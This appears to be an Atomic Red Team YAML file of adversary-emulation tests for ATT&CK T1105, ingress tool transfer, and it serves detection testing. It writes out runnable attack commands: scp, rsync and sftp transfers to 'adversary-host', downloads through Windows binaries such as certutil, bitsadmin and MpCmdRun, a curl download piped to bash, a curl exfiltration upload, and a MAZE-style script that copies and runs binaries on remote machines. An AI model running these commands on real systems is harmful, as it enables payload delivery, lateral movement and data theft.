attack_technique: T1105 display_name: Ingress Tool Transfer atomic_tests: - name: rsync remote file copy (push) auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: | Utilize rsync to perform a remote file copy (push) supported_platforms: - linux - macos input_arguments: remote_path: description: Remote path to receive rsync type: path default: /tmp/victim-files remote_host: description: Remote host to copy toward type: string default: victim-host local_path: description: Path of folder to copy type: path default: /tmp/adversary-rsync/ username: description: User account to authenticate on remote host type: string default: victim dependency_executor_name: sh dependencies: - description: | rsync must be installed on the machine prereq_command: | if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi get_prereq_command: | (pkg install -y rsync)||(sudo apt-get -y install rsync) executor: command: | rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} name: sh elevation_required: true - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: | Utilize rsync to perform a remote file copy (pull) supported_platforms: - linux - macos input_arguments: remote_path: description: Path of folder to copy type: path default: /tmp/adversary-rsync/ remote_host: description: Remote host to copy from type: string default: adversary-host local_path: description: Local path to receive rsync type: path default: /tmp/victim-files username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: sh dependencies: - description: | rsync must be installed on the machine prereq_command: | if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi get_prereq_command: | (pkg install -y rsync)||(sudo apt-get -y install rsync) executor: command: | rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} name: sh - name: scp remote file copy 
(push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: | Utilize scp to perform a remote file copy (push) supported_platforms: - linux - macos input_arguments: remote_path: description: Remote path to receive scp type: path default: /tmp/victim-files/ local_file: description: Path of file to copy type: path default: /tmp/adversary-scp remote_host: description: Remote host to copy toward type: string default: victim-host username: description: User account to authenticate on remote host type: string default: victim executor: command: | scp #{local_file} #{username}@#{remote_host}:#{remote_path} name: sh - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: | Utilize scp to perform a remote file copy (pull) supported_platforms: - linux - macos input_arguments: remote_host: description: Remote host to copy from type: string default: adversary-host local_path: description: Local path to receive scp type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy type: path default: /tmp/adversary-scp username: description: User account to authenticate on remote host type: string default: adversary executor: command: | scp #{username}@#{remote_host}:#{remote_file} #{local_path} name: sh - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: | Utilize sftp to perform a remote file copy (push) supported_platforms: - linux - macos input_arguments: remote_path: description: Remote path to receive sftp type: path default: /tmp/victim-files/ local_file: description: Path of file to copy type: path default: /tmp/adversary-sftp remote_host: description: Remote host to copy toward type: string default: victim-host username: description: User account to authenticate on remote host type: string default: victim executor: command: | sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' name: bash - name: sftp remote 
file copy (pull) auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef description: | Utilize sftp to perform a remote file copy (pull) supported_platforms: - linux - macos input_arguments: remote_host: description: Remote host to copy from type: string default: adversary-host local_path: description: Local path to receive sftp type: path default: /tmp/victim-files/ remote_file: description: Path of file to copy type: path default: /tmp/adversary-sftp username: description: User account to authenticate on remote host type: string default: adversary executor: command: | sftp #{username}@#{remote_host}:#{remote_file} #{local_path} name: sh - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: | Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file type: path default: Atomic-license.txt executor: command: | cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} cleanup_command: | del #{local_path} >nul 2>&1 name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: | Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! 
supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file type: path default: Atomic-license.txt executor: command: | $datePath = "certutil-$(Get-Date -format yyyy_MM_dd)" New-Item -Path $datePath -ItemType Directory Set-Location $datePath certutil -verifyctl -split -f #{remote_file} Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } cleanup_command: | Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b description: | This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. supported_platforms: - windows input_arguments: bits_job_name: description: Name of the created BITS job type: string default: qcxjb7 local_path: description: Local path to place file type: path default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt executor: command: | C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 description: | This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. 
supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt executor: command: | (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") cleanup_command: | Remove-Item #{destination_path} -Force -ErrorAction Ignore name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: | OSTap copies itself in a specific way to shares and secondary drives. This emulates the activity. supported_platforms: - windows input_arguments: destination_path: description: Path to create remote file at. Default is local admin share. type: string default: '\\localhost\C$' executor: command: | pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript del AtomicTestT1105.js /Q >nul 2>&1 del AtomicTestFileT1105.js /Q >nul 2>&1 popd name: command_prompt elevation_required: true - name: svchost writing a file to a UNC path auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f description: | svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. 
supported_platforms: - windows executor: command: | copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt cleanup_command: | del C:\T1105.txt >nul 2>&1 del C:\\svchost.exe >nul 2>&1 name: command_prompt elevation_required: true - name: Download a File with Windows Defender MpCmdRun.exe auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc description: | Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ supported_platforms: - windows input_arguments: remote_file: description: URL of file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Location to save downloaded file type: path default: '%temp%\Atomic-license.txt' dependencies: - description: 'Must have a Windows Defender version with MpCmdRun.exe installed' prereq_command: | cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" MpCmdRun.exe /? 
>nul 2>&1 get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually" executor: command: | cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path} cleanup_command: |- del #{local_path} >nul 2>&1 del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt - name: whois file download auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: | Download a remote file using the whois utility supported_platforms: - linux - macos input_arguments: remote_host: description: Remote hostname or IP address type: string default: localhost remote_port: description: Remote port to connect to type: integer default: 8443 output_file: description: Path of file to save output to type: path default: /tmp/T1105.whois.out query: description: Query to send to remote server type: string default: "Hello from Atomic Red Team test T1105" timeout: description: Timeout period before ending process (seconds) type: integer default: 1 dependencies: - description: | The whois and timeout commands must be present prereq_command: | which whois && which timeout get_prereq_command: | echo "Please install timeout and the whois package" executor: name: sh elevation_required: false command: | timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: | Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. 
supported_platforms: - windows input_arguments: target_remote_file: description: File to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt output_file: description: File to write to type: string default: LICENSE.txt executor: command: | (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} name: powershell - name: File download with finger.exe on Windows auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01 description: | Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not expect a successful connection. https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/ supported_platforms: - windows input_arguments: remote_host: description: Remote hostname or IP address type: string default: localhost executor: name: command_prompt command: | finger base64_filedata@#{remote_host} - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | Use IMEWDBLD.exe (built in to Windows) to download a file. This will throw an error for an invalid dictionary file. Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or "%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]." Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file. supported_platforms: - windows input_arguments: remote_url: description: Location of file to be downloaded. 
type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml file_name: description: Name of the file to be downloaded without extension. type: string default: T1105 executor: command: | $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" & $imewdbled #{remote_url} cleanup_command: | $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue) if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore } name: powershell - name: Curl Download File auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a description: | The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not. supported_platforms: - windows input_arguments: file_download: description: File to download type: string default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll curl_path: description: path to curl.exe type: path default: C:\Windows\System32\Curl.exe dependency_executor_name: powershell dependencies: - description: | Curl must be installed on system. 
prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl" Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl" Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" executor: command: | #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll #{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll #{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll #{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll cleanup_command: | del c:\users\public\music\allthethingsx64.dll >nul 2>&1 del c:\users\public\music\allthethingsx64.dll >nul 2>&1 del c:\programdata\allthethingsx64.dll >nul 2>&1 del %Temp%\allthethingsx64.dll >nul 2>&1 name: command_prompt - name: Curl Upload File auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf description: | The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration Expected output will include whether the file uploaded successfully or not. supported_platforms: - windows input_arguments: curl_path: description: path to curl.exe type: path default: C:\Windows\System32\Curl.exe remote_destination: description: Remote destination type: string default: www.example.com file_path: description: File to upload type: string default: c:\temp\atomictestfile.txt dependency_executor_name: powershell dependencies: - description: | Curl must be installed on system. 
prereq_command: | if (Test-Path #{curl_path}) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl" Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl" Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" - description: | A file must be created to upload prereq_command: | if (Test-Path #{file_path}) {exit 0} else {exit 1} get_prereq_command: | echo "This is an Atomic Test File" > #{file_path} executor: command: | #{curl_path} -T #{file_path} #{remote_destination} #{curl_path} --upload-file #{file_path} #{remote_destination} #{curl_path} -d #{file_path} #{remote_destination} #{curl_path} --data #{file_path} #{remote_destination} name: command_prompt - name: Download a file with Microsoft Connection Manager Auto-Download auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc description: | Uses cmdl32 to download an arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitrary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN server profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user. Upon successful execution, the test will open the Calculator and Notepad executables for 10 seconds. 
reference: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html supported_platforms: - windows input_arguments: Path_to_file: description: Path to the Batch script type: path default: PathToAtomicsFolder\T1105\src\T1105.bat dependency_executor_name: powershell dependencies: - description: | #{Path_to_file} must exist on system. prereq_command: | if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}" executor: command: | "#{Path_to_file}" 1>NUL cleanup_command: | del /f/s/q %temp%\T1105 >nul 2>&1 rmdir /s/q %temp%\T1105 >nul 2>&1 name: command_prompt - name: MAZE Propagation Script auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf description: | This test simulates MAZE ransomware's propagation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. Upon successful execution, a specified binary file will attempt to be copied to each online machine; a list of the online machines, as well as a list of offline machines, will be output to a specified location. 
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html supported_platforms: - windows input_arguments: binary_file: description: Binary file to copy to remote machines type: string default: $env:comspec exe_remote_folder: description: Path to store executable on remote machine (no drive letter) type: string default: \Windows\Temp\T1105.exe remote_drive_letter: description: Remote drive letter type: string default: C dependency_executor_name: powershell dependencies: - description: | Binary file must exist at specified location (#{binary_file}) prereq_command: | if (Test-Path #{binary_file}) {exit 0} else {exit 1} get_prereq_command: | write-host "The binary_file input parameter must be set to a binary that exists on this computer." - description: | Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." 
executor: command: | $machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" $offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" $completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" foreach ($machine in get-content -path "$machine_list") {if (test-connection -Count 1 -computername $machine -quiet) {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" echo $machine >> "$completed_list" wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"} else {echo $machine >> "$offline_list"}} cleanup_command: | if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") {foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}} Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue name: powershell - name: Printer Migration Command-Line Tool UNC share folder into a zip file auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e description: | Create a ZIP file from a folder in a remote drive supported_platforms: - windows input_arguments: Path_unc: description: Path to the UNC folder type: path default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ Path_PrintBrm: description: Path to PrintBrm.exe type: path default: C:\Windows\System32\spool\tools\PrintBrm.exe executor: command: | del %TEMP%\PrintBrm.zip >nul 2>&1 #{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\PrintBrm.zip -O FORCE cleanup_command: | del %TEMP%\PrintBrm.zip >nul 2>&1 name: command_prompt - name: Lolbas replace.exe 
use to copy file auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df description: | Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - windows input_arguments: replace_cab: description: Path to the cab file type: path default: PathToAtomicsFolder\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe type: path default: C:\Windows\System32\replace.exe dependency_executor_name: powershell dependencies: - description: | #{replace_cab} must exist on system. prereq_command: | if (Test-Path "#{replace_cab}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}" executor: command: | del %TEMP%\redcanary.cab >nul 2>&1 #{Path_replace} "#{replace_cab}" %TEMP% /A cleanup_command: | del %TEMP%\redcanary.cab >nul 2>&1 name: command_prompt - name: Lolbas replace.exe use to copy UNC file auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a description: | Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - windows input_arguments: replace_cab: description: UNC Path to the cab file type: path default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe type: path default: C:\Windows\System32\replace.exe executor: command: | del %TEMP%\redcanary.cab >nul 2>&1 #{Path_replace} #{replace_cab} %TEMP% /A cleanup_command: | del %TEMP%\redcanary.cab >nul 2>&1 name: command_prompt - name: certreq download auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b description: Use certreq to download a file from the web supported_platforms: - windows input_arguments: local_path: description: Local path to place file type: string default: '%temp%\Atomic-license.txt' 
remote_file: description: URL of file to copy type: url default: https://example.com executor: command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}' cleanup_command: 'del #{local_path} >nul 2>&1' name: command_prompt - name: Download a file using wscript auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188 description: Use wscript to run a local VisualBasic file to download a remote file supported_platforms: - windows input_arguments: vbscript_file: description: Full path to the VisualBasic script that downloads the file type: string default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs dependency_executor_name: powershell dependencies: - description: | #{vbscript_file} must exist on system. prereq_command: | if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}" executor: command: | wscript.exe "#{vbscript_file}" cleanup_command: del Atomic-License.txt >nul 2>&1 name: command_prompt - name: Linux Download File and Run auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 description: | Utilize Linux curl to download a remote file, chmod +x it and run it. supported_platforms: - linux input_arguments: remote_url: description: url of remote payload type: string default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh payload_name: description: payload name type: string default: atomic.sh executor: command: | curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name} cleanup_command: | rm #{payload_name} name: sh - name: Nimgrab - Transfer Files auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e description: | Use nimgrab.exe to download a file from the web. 
supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt executor: command: | cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path} cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt dependency_executor_name: powershell dependencies: - description: | NimGrab must be installed on system. prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions. 
supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file type: path default: '%temp%\Atomic-license.txt' executor: command: | powershell.exe iwr -URI #{remote_file} -Outfile #{local_path} cleanup_command: | del %temp%\Atomic-license.txt >nul 2>&1 name: command_prompt elevation_required: true - name: Arbitrary file download using the Notepad++ GUP.exe binary auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51 description: |- GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files (.zip) from the internet/GitHub. [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20) Upon execution, a sample zip file will be downloaded to the C:\Temp\Sample folder supported_platforms: - windows input_arguments: target_file_url: description: 'URL of the target ZIP file (Eg: https://example.com/test.zip)' type: url default: https://getsamplefiles.com/download/zip/sample-2.zip working_dir: description: The directory where GUP.exe and its dependencies exist type: path default: PathToAtomicsFolder\T1105\bin\ gup_executable: description: GUP is an open source signed binary used by Notepad++ for software updates type: String default: PathToAtomicsFolder\T1105\bin\GUP.exe target_file_sha256: description: SHA256 value of target ZIP file type: string default: CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6 dependency_executor_name: powershell dependencies: - description: Gup.exe binary must exist on disk at specified location (#{gup_executable}) prereq_command: if (Test-Path "#{gup_executable}") {exit 0} else {exit 1} get_prereq_command: |- New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null Invoke-WebRequest 
"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}" executor: command: |- mkdir "c:\Temp" cd #{working_dir} GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}" cleanup_command: rmdir /s /q "C:\Temp\Sample" >nul 2>nul name: command_prompt elevation_required: true - name: File download via nscurl auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c description: | Use nscurl to download and write a file/payload from the internet. -k = Disable certificate checking -o = Output destination supported_platforms: - macos input_arguments: remote_file: description: URL of remote file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Local path to place remote file type: path default: license.txt executor: command: nscurl -k "#{remote_file}" -o "#{destination_path}" cleanup_command: rm "#{destination_path}" name: sh elevation_required: false - name: File Download with Sqlcmd.exe auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181 description: |- One of the Windows packages, 'Sqlcmd.exe', can be abused to download malicious files from C2 servers. This Atomic exhibits similar behavior by downloading a sample zip file from the src directory of this technique folder via a GitHub URL. supported_platforms: - windows input_arguments: remote_url: description: URL of the C2 Server from where file/s need to be downloaded type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip local_file_path: description: The local file path along with filename to where the file needs to be downloaded and placed. 
type: path default: C:\T1105.zip dependency_executor_name: powershell dependencies: - description: Windows package 'Sqlcmd' need to be available in the machine to execute this atomic successfully prereq_command: if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1} get_prereq_command: winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null executor: command: 'sqlcmd -i #{remote_url} -o #{local_file_path}' cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null name: powershell elevation_required: true - name: Remote File Copy using PSCP auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe description: | Copy a staged file using PSCP.exe to a public target location. supported_platforms: - windows input_arguments: pscp_url: description: pscp.exe download path type: string default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe pscp_binary: description: PSCP binary location type: string default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe' scp_user: description: Username of the SCP user type: string default: 'atomic' scp_password: description: Password for the SCP User type: string default: 'atomic' scp_port: description: port for the remote server type: string default: '22' exfil_package: description: path to exfil package type: path default: 'C:\Temp\T1105_scp.zip' target_location: description: Remote location where the data will be copied to. type: string default: 127.0.0.1 target_filename: description: Filename on the destination. type: string default: T1105_scp.zip dependency_executor_name: powershell dependencies: - description: | pscp.exe must be available on the system. 
prereq_command: | if (Test-Path #{pscp_binary}) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe" executor: command: | fsutil file createnew C:\Temp\T1105_scp.zip 1048576 echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename} cleanup_command: | del /f /q #{exfil_package} name: command_prompt elevation_required: false - name: Windows push file using scp.exe auto_generated_guid: 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d description: | This test simulates pushing files using SCP on a Windows environment. supported_platforms: - windows input_arguments: remote_path: description: Path of folder to copy type: path default: /tmp/ remote_host: description: Remote host to send type: string default: adversary-host local_path: description: Local path to copy from type: path default: C:\temp file_name: description: Name of the file to transfer type: string default: T1105.txt username: description: User account to authenticate on remote host type: string default: adversary dependency_executor_name: powershell dependencies: - description: | This test requires the `scp` command to be available on the system. prereq_command: | if (Get-Command scp -ErrorAction SilentlyContinue) { Write-Output "SCP command is available." exit 0 } else { Write-Output "SCP command is not available." exit 1 } 